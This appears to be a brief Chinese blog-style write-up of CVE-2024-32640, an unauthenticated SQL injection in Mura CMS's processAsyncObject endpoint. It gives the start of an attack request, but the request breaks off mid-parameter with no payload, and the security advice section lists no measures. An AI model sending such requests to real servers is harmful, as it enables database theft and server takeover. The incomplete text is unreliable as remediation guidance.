本文共 809 字，大约阅读时间需要 2 分钟。

Mura CMS漏洞详解

产品简介

Mura CMS（Content Management System，内容管理系统）是一款开源的内容管理平台，旨在帮助开发者和内容创作者高效管理网站内容。作为一款企业级的网站解决方案，它支持构建公司网站、产品目录、新闻发布系统以及客户支持渠道等功能模块。

漏洞概述

2024年5月8日，网络安全研究人员公开了一个严重的安全漏洞——CVE-2024-32640。这一漏洞存在于Mura CMS的processAsyncObject组件中，具体表现为未经身份验证的远程攻击者可通过构造特定请求，注入恶意SQL语句，从而获取数据库中的敏感信息。此外，攻击者还可能利用这一漏洞在服务器上写入后门文件，实现远程代码执行，最终获得服务器控制权限。

漏洞复现环境

该漏洞被发现于Mura CMS的开发环境中。根据公开信息，FOFA（安全工具）截图显示了漏洞的复现环境，具体细节已被移除以保护相关信息。

漏洞复现

攻击者可以通过以下请求构造恶意输入：

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencodedobject=displayregion&contenthisti

请注意，以上请求示例仅用于技术分析，实际攻击中应严格遵守法律法规，未经授权的攻击行为将受到严惩。

安全建议

为了防止此类安全威胁，建议：

如需进一步技术支持，可联系专业安全团队进行详细评估和修复。